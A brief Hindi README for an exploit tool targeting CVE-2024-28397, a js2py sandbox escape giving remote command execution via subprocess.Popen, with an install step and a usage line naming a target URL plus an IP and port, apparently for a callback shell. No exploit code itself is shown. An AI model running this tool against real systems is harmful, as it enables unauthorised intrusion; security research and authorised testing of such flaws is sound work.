
js2py <= 0.74 सैंडबॉक्स पलायन (CVE-2024-28397)
js2py <= 0.74 में सैंडबॉक्स एस्केप के माध्यम से रिमोट कमांड निष्पादन (RCE) के लिए एक्सप्लॉइट।
यह असुरक्षित JavaScript मूल्यांकन के माध्यम से होस्ट सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देता है।
subprocess.Popen के माध्यम से कमांड निष्पादननिर्भरताएँ:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा ऑडिट के लिए प्रदान किया गया है।
लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।